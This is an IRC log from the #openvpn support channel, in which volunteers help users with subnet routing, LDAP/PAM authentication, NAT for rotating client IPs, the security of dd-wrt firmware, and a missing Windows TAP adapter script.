09:47 < Eagleman7> I want to reach my other vpn network running on 10.8.1.0 ( TCP ) from my 10.8.0.0 network
09:48 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
09:49 < Eagleman> Lost my connection, last message: [16:39] I want to reach my...
09:51 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds]
09:52 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has joined #openvpn
09:52 -!- Jonathan__ [~Jonathan@173.212.224.54] has quit [Ping timeout: 264 seconds]
09:54 <@ecrist> do you have ip_forwarding enabled in the kernel?
09:54 < Eagleman> yes
09:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
09:54 <@ecrist> you have route, but you also need to push that route
09:54 <@ecrist> so, you need push "route 10.8.1.0 255.255.255.0" in your config
09:54 -!- mattock is now known as mattock_afk
09:55 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
09:55 < Eagleman> That's done in the ccd config
09:56 <@ecrist> I don't see a CCD config in your pastebin
09:56 <@ecrist> why would you do it there?
09:57 < Eagleman> never mind, i just follow what you are saying
09:57 < Eagleman> Ok, that's done, now i got another route on my windows system: 10.8.1.0 255.255.255.0 10.8.0.1 10.8.0.5 30
09:57 < Eagleman> However i am still not able to ping my other client 10.8.1.2
09:58 < Eagleman> traceroute shows me that it is going to 10.8.0.1 but then i am getting: Request timed out.
09:59 <@ecrist> does the other client know how to route to 10.8.0.1?
10:00 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds]
10:00 < Eagleman> 10.8.0.0 * 255.255.255.0 U 0 0 0 tun3
10:00 < Eagleman> 10.8.1.0 10.8.0.1 255.255.255.0 UG 0 0 0 tun3
10:00 < Eagleman> 10.8.1.0 * 255.255.255.0 U 0 0 0 tun4
10:00 < Eagleman> That's on 10.8.1.2
10:00 < Eagleman> 10.8.1.2 is also 10.8.0.2
10:01 < Eagleman> eagleman.net is connected to vpn.eagleman.net with 2 connections: UDP: 10.8.0.2 TCP: 10.8.1.2
10:03 < Eagleman> So yes it does know the route to 10.8.0.1. Ping succeeded
10:05 <@ecrist> that's retarded
10:06 < Eagleman> The double client connection on eagleman.net?
10:06 <@ecrist> why are you connected both via TCP and UDP?
10:06 <@ecrist> yes
10:07 < Eagleman> So i am able to reach my server using tcp and udp when connected to either one of these when connected to vpn.eagleman.net
10:07 < Eagleman> That was the idea
10:07 <@ecrist> I don't think it's a good idea to be connected to both
10:07 <@ecrist> you're going to have conflicting routes
10:08 <@ecrist> so, you're using a single client to ping itself from one VPN subnet to the other, right?
10:08 < Eagleman> So let's say i am only connected to udp on eagleman.net
10:08 < Eagleman> How am i able to reach eagleman.net from vpn.eagleman.net when connected with tcp?
10:08 <@ecrist> I don't understand your question
10:08 <@ecrist> !diagram
10:08 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle
10:10 < Eagleman> I will be back when i have my topology
10:15 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 255 seconds]
10:17 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 240 seconds]
10:19 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
10:23 -!- AsadH is now known as zz_AsadH
10:25 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
10:39 -!- Porkepix [~Porkepix@157.138.191.104] has joined #openvpn
10:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
10:45 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
10:51 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:55 -!- mattock_afk is now known as mattock
11:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
11:09 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
11:09 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
11:09 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
11:09 -!- mode/#openvpn [+o krzee] by ChanServ
11:09 -!- zz_AsadH is now known as AsadH
11:24 -!- Porkepix [~Porkepix@157.138.191.104] has quit [Quit: Computer has gone to sleep.]
11:37 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn
11:37 -!- mode/#openvpn [+v s7r] by ChanServ
11:41 < Jonathan__> Good afternoon
11:43 < Jonathan__> I have a question. I currently have 5 servers running OpenVPN in various places of the world. All using LDAP authentication and individual certs for client authentication.
11:44 < Jonathan__> Currently, when a user authenticates with my server, they are assigned the default WAN IP for internet traffic routing. I know you can assign static WAN IPs using ccd, but is there a way to assign WAN IPs on a round robin basis?
11:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 245 seconds]
11:44 < Jonathan__> I'd like to be able to use more than one WAN IP per server for my clients without forcing them to a specific static IP each time
11:46 < Jonathan__> forcing a static IP in my opinion takes away some of the anonymity associated with my services
11:56 < Jonathan__> also, has anyone attempted to store client keys in ldap?
11:56 -!- AsadH is now known as zz_AsadH
12:21 -!- idlecool [~i@sd.gs] has quit [Remote host closed the connection]
12:24 -!- idlecool [~i@sd.gs] has joined #openvpn
12:40 < Pei> you guys rock
12:40 < Pei> thanks for all the help
12:44 -!- zz_AsadH is now known as AsadH
12:44 -!- nickanderson is now known as nickanderson_afk
12:46 -!- cmelbye [~charlie@yourwiki/staff/charlie] has quit [Ping timeout: 255 seconds]
12:47 -!- cmelbye [~charlie@yourwiki/staff/charlie] has joined #openvpn
12:49 -!- dgbaley27 [~matt@ucb-np1-210.colorado.edu] has joined #openvpn
12:50 < dgbaley27> Hey. I've been using OpenVPN for a while now for personal use. I'm now using it in a larger environment. I'd like to switch from certificates to LDAP (via PAM).
12:51 < dgbaley27> Does anyone have any comments in particular on doing this? Do I still use the TA key?
12:51 < dgbaley27> I basically just want to be able to add people to the "openvpn" group in LDAP in order to give them access.
12:52 < dgbaley27> Is there any reason I should use the LDAP plugin directly? I like the flexibility that PAM has to offer (can add local accounts too), and the passwords are actually krb5
12:54 < dgbaley27> Also, does the warning under --client-cert-not-required still apply as I'm not using a home-grown script but a pam plugin which I think is provided by openvpn itself
12:58 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has joined #openvpn
12:58 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has quit [Changing host]
12:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
13:10 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 245 seconds]
13:15 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 245 seconds]
13:19 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds]
13:21 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
13:23 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
13:25 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Excess Flood]
13:28 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
13:33 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
13:33 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
13:33 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
13:38 -!- kothog [~kothog@unaffiliated/kothog] has quit [Ping timeout: 246 seconds]
13:44 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn
13:46 < Jonathan__> dgbaley: I am using OpenLDAP for authentication. Using PHPLDAPAdmin as the admin interface for managing users
13:46 < Jonathan__> I still require individual certs/keys as a second step of authentication
13:53 < dgbaley27> Hmm, wouldn't that really be the first step then? In any event, that seems like a PITA, how do you distribute keys?
14:02 -!- p3rror [~mezgani@2001:0:53aa:64c:3863:5e7c:d670:1b82] has joined #openvpn 14:04 <@dazo> dgbaley27: you will always need server sertificates to make it possible to use a multi-peer mode on the server ... but read carefully the section about --client-cert-not-required in the man page 14:06 <@dazo> Jonathan__: WAN IP addresses!? ... I know what WAN IPs are ... but I don't understand why you use that with VPN .... 14:06 <@dazo> or do you use --redirect-gateway ... and VPN clients use your WAN IP as their public IP? 14:07 < havoc> gah, what happened to the "create TAP adpater" script? 14:07 < havoc> (on windows) 14:07 * dazo looks for mattock .... 14:07 <@ecrist> there was a problem with the windows build 14:07 < Jonathan__> Dazo: I offer a small VPN service for individuals to mask their true IPs 14:07 <@ecrist> mattock supposedly fixed it 14:07 < havoc> ecrist: ah 14:07 < havoc> I guess I can roll out 2.2.2 still 14:08 < Jonathan__> dazo: I just dont want all my users using the same public IP, nor do I wish to force static IPs 14:08 < havoc> ecrist: I've been playing w/ silent deployment of ovpn 14:08 <@dazo> Jonathan__: okay ... then you that's a NAT setup you need to figure out ... not really related to OpenVPN ... so, if you use Linux/iptables then you might get some better answers on #netfilter 14:09 <@dazo> havoc: I blame mattock for this one ;-) ... he did talk about rolling out a new 2.3 windows installer though 14:09 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer] 14:09 < dgbaley27> dazo: I know that I still need the server side certificates. 
But I wouldn't be using auth-user-pass-verify, I'd be using plugin openvpn-auth-pam.so 14:09 < havoc> dazo: ok, no biggie though, 2.2.2 is fine for what I'm looking for 14:09 < Jonathan__> dazo I was lookingat using client connect and disconnect scripts 14:09 < Jonathan__> to setup NAT 14:09 < Jonathan__> just looking for some direction I guess, I know its not openvpn product related 14:09 -!- corretico [~luis@190.211.93.38] has joined #openvpn 14:10 -!- p3rror [~mezgani@2001:0:53aa:64c:3863:5e7c:d670:1b82] has quit [Ping timeout: 245 seconds] 14:10 <@dazo> Jonathan__: if you want truly randomisation .... then I'd say firewall rules are the proper place ... otherwise, you need to look at the --learn-address script hook ... that's called when the VPN IP address is set or changed 14:10 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has joined #openvpn 14:10 -!- DBordello [~DBordello@2607:ff50:0:1a::10] has quit [Changing host] 14:10 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 14:10 -!- p3rror [~mezgani@2001:0:53aa:64c:3055:5e7c:d606:f58d] has joined #openvpn 14:11 <@dazo> dgbaley27: that's basically the same .... the point is without username/pass auth ... you have a completely anonymous tunnel which anyone can connect to 14:11 <@dazo> dgbaley27: that is if you set --client-certs-not-required on the server 14:12 < dgbaley27> dazo: sure, but what I plan on is certs-not-required and plugin openvpn-auth-pam, so there shouldn't be anonymous access 14:12 <@dazo> that's what I'm saying 14:15 < dgbaley27> dazo: guh, just to be sure: client-certs-not-required and plugin openvpn-auth-pam is a secure setup without anonymous access, correct? 14:17 <@dazo> dgbaley27: yes. However, openvpn-auth-pam + certs are even safer, but you don't want that ... 
but both are fine
14:17 < dgbaley27> I don't want to do it just because I don't have a scalable way to generate user keys, and can't rely on them being able to send me proper CSRs
14:18 < dgbaley27> scalable or safe*
14:20 < dgbaley27> I don't think it's relevant to this discussion, but this is more of an access setup. The traffic itself doesn't really need to be secure, I can rely on the end-to-end principle for that.
14:21 <@dazo> well, that makes it possible to lower the security a bit without losing your sleep ... but the overall security isn't stronger than the weakest link
14:23 < dgbaley27> But where is the weak link? Assuming the CA is trusted, the connection is secure and the endpoint is trusted (from the clients' perspective) before the password is exchanged.
14:24 <@dazo> the connection is only as secure as the authentication is secure
14:24 <@dazo> without client certs, you're more vulnerable to bruteforce attacks
14:24 -!- p3rror [~mezgani@2001:0:53aa:64c:3055:5e7c:d606:f58d] has quit [Ping timeout: 245 seconds]
14:24 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 276 seconds]
14:25 <@dazo> bruteforce on the username/password that is
14:25 <@krzee> and password re-use issues
14:25 <@dazo> oh true
14:25 <@krzee> which is WAY more common than most non-hackers give credit to
14:27 < dgbaley27> Well, password issues and brute-force attacks aren't really my issue in this setup =). Each host on the network is secured via the same kerberos system, which is not under my control.
14:28 <@dazo> ehm .... anyone having a public service available, requiring username/passwords, can experience bruteforce attacks
14:29 <@dazo> ever had a public server responding to ssh on port 22 ... and ever checked the log file ssh uses?
14:30 <@krzee> like within minutes of installing
14:30 <@krzee> the internet is so dirty dirty
14:30 <@krzee> toss up a honeypot sometime, it's a nasty nasty place
14:31 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn
14:31 -!- mode/#openvpn [+o pekster] by krzee
14:32 <@dazo> dgbaley27: on almost all my openvpn setups I use certs, auth-user-pass and tls-auth ... just to ensure that only the users I control are able to connect ... not that the data itself is that sensitive, but I don't want to open up a door for anyone else ..... but people do also call me paranoid ;-)
14:33 * dazo even wrote his own openvpn auth plug-in, as he found auth-pam or auth-ldap too simple
14:33 <@krzee> without a healthy dose of paranoia you'd be doing it wrong!
14:33 <@krzee> anyone who disagrees should throw up a decent honeypot sometime
14:34 <@krzee> heh
14:34 <@dazo> heh :)
14:34 <@krzee> and of course, none of that is targeted
14:35 <@krzee> http://www.comedycentral.com/video-clips/az3sy8/chappelle-s-show-if-the-internet-was-a-real-place
14:35 <@vpnHelper> Title: If the Internet Was a Real Place - Video Clip | Comedy Central (at www.comedycentral.com)
14:35 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn
14:36 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection]
14:37 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn
14:37 < lickalott> !welcome
14:37 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server.
|| Also interesting: !man !/30 !topology !iporder !sample !forum
14:37 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
14:37 < lickalott> !goal
14:37 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
14:38 < lickalott> Gents, I just dd-wrt'd my router and would like to enable openvpn on it. Is this the chan I should be seeking help in?
14:39 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
14:39 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
14:39 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
14:39 -!- mode/#openvpn [+o krzee] by ChanServ
14:39 <@dazo> lickalott: yeah ... but dd-wrt ... seriously? that's a security risk itself
14:39 < lickalott> thoughts?
14:40 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection]
14:40 < lickalott> I wanted to build a pfsense box but don't have the funds for the hardware att.
14:40 <@dazo> lickalott: there exists a database of all ssh/https keys used in all dd-wrt distributions
14:40 <@dazo> lickalott: and the dd-wrt developers didn't see that as a problem
14:41 < lickalott> I have the AS running on my ubuntu server and have access to the network from outside, but I wanted it on my router.
14:41 < lickalott> openwrt doesn't work for my model. Is there another alternative I should be looking into?
14:41 <@dazo> lickalott: and I discovered a hard-coded iptables rule in one version ... and users were never warned about it ... "just wait for the next release which has no ETA for the fix" was the developers' response
14:41 < lickalott> nice
14:41 <@dazo> lickalott: if openwrt doesn't work ... hmmm .... maybe tomato
14:42 < lickalott> I don't have a wrt54g anymore
14:42 <@dazo> what do you have now?
14:42 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
14:43 < lickalott> E3200
14:44 < lickalott> you think it would be safer to leave the stock FW on the router and just continue to run the AS off of the ubuntu machine?
14:45 < defsdoor> dazo, your dd-wrt comments concern me - I've just rolled out a buffalo dd-wrt to our manchester office - to replace a checkpoint firewall piece of junk
14:45 <@dazo> in fact, I'd probably place the ubuntu box in front, with proper firewalling + openvpn (community or AS)
14:45 <@dazo> defsdoor: I'll see if I can find the threads again
14:46 < defsdoor> we pay a fortune for our checkpoint gateways and they don't even do QoS
14:46 < defsdoor> so I'm binning them
14:46 < defsdoor> and the many thousands a year support costs
14:47 <@dazo> defsdoor: I know some companies ship TP-Link WR1043ND with openwrt ... I've set up a few myself, and that's cheap and reasonably good hardware
14:47 <@dazo> however ... the later hw versions have some wireless driver issues ... but I haven't tried newer openwrt firmwares in a while
14:48 -!- bjh4 [~bjh4@12.239.198.1] has quit [Remote host closed the connection]
14:50 < neilhwatson> We need a raspberry-router :)
14:50 <@dazo> heh
14:51 < defsdoor> I have 2 pis - running an led string clock off one right now
14:51 <@dazo> neilhwatson: tbh ... the tp-link gets pretty close to that
14:51 <@dazo> (in hackability, that is)
14:55 < neilhwatson> Openvpn question: Connecting a client to a server, where the server will act as a gw for the client. Does the server need one IP for eth0 and a second IP for tun?
14:55 < defsdoor> well I can install openwrt on these buffalos by the look of it
14:55 < defsdoor> I've just ordered one for home so I will give it a go
14:55 < neilhwatson> buffalo?
14:55 <@dazo> neilhwatson: it needs an IP for the eth where the traffic will go out (if you do NAT) ...
but it really doesn't need an IP on the tun device, if your clients support routing by device
14:56 < neilhwatson> Server will not NAT.
14:58 < neilhwatson> In example config files I've seen 'server '. I presume that denotes the tunnel end points. Should one of those IPs be the eth0 on the server?
14:58 < defsdoor> nope
14:58 < defsdoor> just pick a private unlikely to clash subnet
14:59 < rob0> I bet you will need a tun0 IP address, for routing. Then you can use proxy ARP for clients, with no NAT.
14:59 < defsdoor> (unlikely to clash with any other private subnet you may use)
15:01 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds]
15:01 -!- EugeneKay [EugeneKay@madeitwor.se] has quit [Ping timeout: 276 seconds]
15:01 < neilhwatson> No NAT or private IPs involved. I want client with public IP to have another public IP on the same subnet as the server.
15:02 <@dazo> neilhwatson: I don't know if I remember it correctly ... but I believe Jan Just Keijser wrote about that in his OpenVPN 2 Cookbook
15:02 <@dazo> !book
15:02 <@vpnHelper> "book" is http://www.packtpub.com/openvpn-2-cookbook/book check out JJK's awesome cookbook for openvpn 2!
15:02 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn
15:02 <@dazo> that's a really difficult setup though
15:02 <@dazo> with many pitfalls
15:03 <@dazo> or let me think ....
15:03 < defsdoor> if it's all public IPs why not just alias the ip on server A and forward the traffic to server B ?
15:03 <@dazo> maybe you can do SNAT/DNAT .... traffic coming from the VPN gets a specific NATed IP address
15:04 <@dazo> and then you can port-nat incoming traffic to the server's IP subnet to the VPN clients, if you need that direction
15:04 < neilhwatson> The client's public IP is dynamic. I want to use the tunnel to give it a static from the server's network.
15:04 <@dazo> ahh, okay
15:04 < defsdoor> messy routing shenanigans needed though
15:04 <@dazo> that's a bit different ...
and I do basically the same in one of my setups
15:05 < neilhwatson> I'd make the tunnel the dgw.
15:05 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
15:05 < defsdoor> you can't
15:05 <@dazo> I have a mail server on a network with dynamic IPs ... and a virtual server hosted somewhere with a static IP
15:05 < defsdoor> else outside the tunnel won't route (the tunnel itself)
15:05 < defsdoor> you'll need to do connection tracked routing
15:06 <@dazo> then I have DNAT/SNAT rules on the VPN server (the VM) which redirect all connections on selected ports to the VPN IP of the mail server
15:06 < neilhwatson> Go back to 'you can't'. Why is that?
15:07 <@dazo> but I needed some tweaking on the mail server, with ip routing tables ... so that the traffic from the VPN would be replied to via the VPN as well
15:07 < hg_5> how to install 2 tap windows adapters?
15:08 <@dazo> hg_5: run the addtap.bat script in the OpenVPN\bin directory
15:08 < defsdoor> neilhwatson, well - unless you are ok with 100% of traffic going that way and a single specific route to your server's public IP via the primary gw
15:08 < hg_5> dazo I don't have this
15:08 < neilhwatson> The first part yet. The second part I don't follow.
15:08 < hg_5> in this directory
15:08 -!- p3rror [~mezgani@41.140.153.11] has joined #openvpn
15:08 <@dazo> hg_5: OpenVPN 2.3?
15:08 < hg_5> dazo yes
15:09 < defsdoor> neilhwatson, if you change the default gateway the tunnel will go down that gateway - or try to
15:09 <@dazo> hg_5: ahh, okay .... mattock ^^^^ see hg_5 ... need that fixed very soon now!
15:09 < defsdoor> which will obviously fail as it needs to go via internet to that server
15:09 < hg_5> dazo what?
15:09 < havoc> dazo: heh, I guess other ppl need it too ;)
15:09 <@dazo> hg_5: the windows installer failed to install that script ....
and we're waiting on a new installer
15:09 <@dazo> mattock is the guy who built the installer
15:10 < defsdoor> neilhwatson, I do something similar at work to change the default gateway of my desktop pc to go via a vpn to my home server
15:10 < defsdoor> so I need static routes to my home server via the physical gateway
15:10 < hg_5> dazo oh, when will it be available?
15:10 < neilhwatson> I'm sure I've read examples of using openvpn to route all traffic, which I assume acts as a default gateway, on untrusted networks.
15:11 < defsdoor> neilhwatson, it's perfectly simple to do - but you will need a static route to the internet facing IP of the other end of the tunnel
15:12 < defsdoor> via the physical/initial gw
15:12 < rob0> dazo, I posted about the proxy ARP way to "have a public IP at home" on the list some years ago, IIRC before JJK's book. :)
15:12 < neilhwatson> That makes sense.
15:12 <@dazo> rob0: maybe that's where JJK took the inspiration from? ;-)
15:13 < neilhwatson> Back to the number of required IPs. Does the server tun need an address?
15:13 < rob0> I used an RFC 1918 address for the server tun0, and that address could be the new gateway for the clients.
15:13 -!- batrick [~batrick@nmap/developer/batrick] has quit [Ping timeout: 245 seconds]
15:14 <@dazo> hg_5: which .exe/.com files do you have in the OpenVPN bin directory?
15:15 < rob0> dazo, ha! I even used the work "cookbook". This was 2005, http://openvpn.net/archive/openvpn-users/2005-09/msg00108.html
15:15 < hg_5> dazo http://puu.sh/1XwE6
15:15 <@vpnHelper> Title: [Openvpn-users] openvpn cookbook: get a static IP at home (at openvpn.net)
15:15 < rob0> s/work/word/
15:15 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood]
15:15 <@dazo> hg_5: okay ...
a lot more is missing there it seems
15:15 -!- simcop2387 [~simcop238@simcop2387.info] has joined #openvpn
15:15 -!- simcop2387 [~simcop238@simcop2387.info] has quit [Changing host]
15:15 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn
15:15 <@dazo> hg_5: it's all related to the TAP driver installation ... the TAP tools haven't been installed
15:15 < neilhwatson> Shouldn't the client tun be the gw, but with a static route to the server's public IP?
15:16 < hg_5> where are tap tools?
15:16 <@dazo> hg_5: can you try to install this one? http://swupdate.openvpn.org/community/releases/tap-windows-9.9.2.exe
15:17 < rob0> neilhwatson, read the whole thread, or at least the first followup which corrects an oversight in the original post.
15:18 <@dazo> hg_5: you'll then get in your Programfiles directory a TAP-Windows\bin directory with addtap.bat
15:18 < rob0> I assume since you mention eth0/tun0, you are using Linux, in which case this is exactly what you seem to be after.
15:18 < hg_5> dazo yeah great thanks it has been installed! :)
15:19 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn
15:20 <@dazo> rob0: that summarises very well my setup :) ... and I vaguely remember this info from when you helped me with it too
15:22 < neilhwatson> rob0, thanks for the url
15:23 <@dazo> havoc: seems installing this one manually helps out with the "create tap script" issue ...
http://swupdate.openvpn.org/community/releases/tap-windows-9.9.2.exe
15:23 < havoc> dazo: cool, thanks
15:23 <@dazo> !factoids search windows
15:23 <@vpnHelper> 'windows_mobile', 'windows_problems', and 'windows'
15:23 <@dazo> !factoids search tap
15:23 <@vpnHelper> 'tap', 'mactuntap', 'wintaphide', 'tunortap', and 'obsdtap'
15:23 <@dazo> !tap
15:23 <@vpnHelper> "tap" is "bridge" is (#1) http://openvpn.net/index.php/documentation/faq.html#bridge1, or (#2) http://openvpn.net/index.php/documentation/miscellaneous/ethernet-bridging.html, or (#3) Bridging looks like a good choice to people who don't know how to set up IP routing, but to learn routing is generally far better., or (#4) useful for windows sharing (without wins server) and LAN gaming, anything where
15:23 <@vpnHelper> the protocol uses MAC addresses instead of IP addresses.
15:23 < havoc> won't help me on the silent installs, but good enough for interactive stuff
15:24 <@dazo> havoc: you can't do /s on that installer? and provide some "enable this option" as well via the command line?
15:24 < havoc> don't know, haven't tried the tap installer alone yet
15:25 < havoc> is the functionality installed w/ 2.3.0 to add a TAP, if you just have the script?
15:25 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
15:25 < havoc> if so, then I just need to install the tap installer once, and copy the .bat
15:25 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
15:25 <@dazo> havoc: I don't know how this really works out, tbh
15:26 < havoc> np
15:26 <@dazo> I tend to stay away from Windows as much as I can
15:27 < havoc> must be nice :(
15:27 <@dazo> havoc: yeah, it is ... until a bunch of windows users complain about the same issue ... and no immediate solution is found :)
15:28 <@dazo> then those complaints are worse than Windows :-P
15:28 < havoc> unfortunately most clients are windows :(
15:29 <@dazo> ahh ...
that's why I so often stay away from this channel ;-)
15:30 -!- mezgani_ [~mezgani@41.140.214.40] has joined #openvpn
15:31 -!- p3rror [~mezgani@41.140.153.11] has quit [Ping timeout: 248 seconds]
15:35 -!- mezgani_ [~mezgani@41.140.214.40] has quit [Ping timeout: 248 seconds]
15:35 < rob0> I look in on the channel, but I don't answer the Windows questions. :)
15:35 <@dazo> I'm probably too soft ....
15:36 < rob0> I figure if the Windows community can't support themselves, let them fail. :)
15:37 < havoc> kinda defeats the purpose of making openvpn for anything other than linux then
15:39 < havoc> and this isn't about any community "supporting themselves", this is about a single app
15:39 -!- p3rror [~mezgani@41.250.232.206] has joined #openvpn
15:40 < EugeneKay> I missed the question, so I'll stick with "Patches welcome"
15:40 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]]
15:40 <@dazo> EugeneKay++
15:42 < rob0> !sweet
15:42 <@vpnHelper> "sweet" is http://sweet.nodns4.us/ =(
15:53 < lickalott> dazo "creating certificates and keys" I was following this http://www.howtogeek.com/64433/how-to-install-and-configure-openvpn-on-your-dd-wrt-router/, but it's not working. I don't have an easy-rsa anywhere on my laptop or my server.
15:53 <@dazo> why do people use non-official guides .....
15:53 <@dazo> lickalott: http://openvpn.net/index.php/open-source/documentation/howto.html#pki
15:54 <@vpnHelper> Title: HOWTO (at openvpn.net)
15:54 < lickalott> that's what I needed!
15:54 <@dazo> lickalott: easy-rsa can be installed manually ... it's just a bunch of scripts even
15:54 <@dazo> lickalott: https://github.com/OpenVPN/easy-rsa/archive/master.zip
15:55 < lickalott> I didn't want to come out and ask you to throw me a link I could've googled for (and in the process make it known that my google-fu sucks at times)
15:56 < lickalott> k. got some reading to do. thanks!
15:57 -!- s7r [~s7r@openvpn/user/s7r] has quit [Quit: Leaving.]
15:58 -!- mezgani_ [~mezgani@41.250.232.161] has joined #openvpn
15:58 < rob0> You definitely should not run easy-rsa on the server machine. Ideally keep your CA removed from the network. Also, I doubt a dd-wrt router will have adequate entropy for openssl work.
15:58 -!- brute11k1 [~brute11k@89.249.231.171] has quit [Quit: Leaving.]
15:58 <@dazo> +1
15:58 < rob0> key generation, certificate signing, et c.
16:00 -!- p3rror [~mezgani@41.250.232.206] has quit [Ping timeout: 248 seconds]
16:00 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.]
16:00 <@dazo> lickalott: if it is any comfort ... your google-fu is pretty average, at least you know what google is ... it's just too many popping in here who seem to never have heard about that service too
16:03 -!- dgbaley27 [~matt@ucb-np1-210.colorado.edu] has left #openvpn []
16:04 -!- mezgani_ [~mezgani@41.250.232.161] has left #openvpn ["Leaving"]
16:05 -!- p3rror [~mezgani@41.250.232.161] has joined #openvpn
16:09 < hg_5> hello, I have a router connected as client to openvpn server, it is set to wisp mode, and clients are connected to it in a different subnet (openvpn subnet: 10.9.0.x, clients subnet connected to this router 192.168.7.x) is it possible to see those clients?
16:11 < rob0> !clientlan
16:11 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a
16:11 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
16:13 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:18 -!- dazo is now known as dazo_afk
16:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
16:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:32 -!- mezgani_ [~mezgani@41.249.36.240] has joined #openvpn
16:33 -!- p3rror [~mezgani@41.250.232.161] has quit [Ping timeout: 248 seconds]
16:57 -!- mezgani__ [~mezgani@41.248.110.86] has joined #openvpn
17:00 -!- mezgani_ [~mezgani@41.249.36.240] has quit [Ping timeout: 255 seconds]
17:02 -!- mezgani__ [~mezgani@41.248.110.86] has quit [Ping timeout: 248 seconds]
17:08 -!- AsadH is now known as zz_AsadH
17:18 -!- TheLaw [~law@irc.l4w.info] has joined #openvpn
17:44 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
17:44 -!- mode/#openvpn [+o krzee] by ChanServ
18:31 -!- zz_AsadH is now known as AsadH
18:37 -!- mode/#openvpn [+v-o pekster pekster] by pekster
18:50 -!- AsadH is now known as zz_AsadH
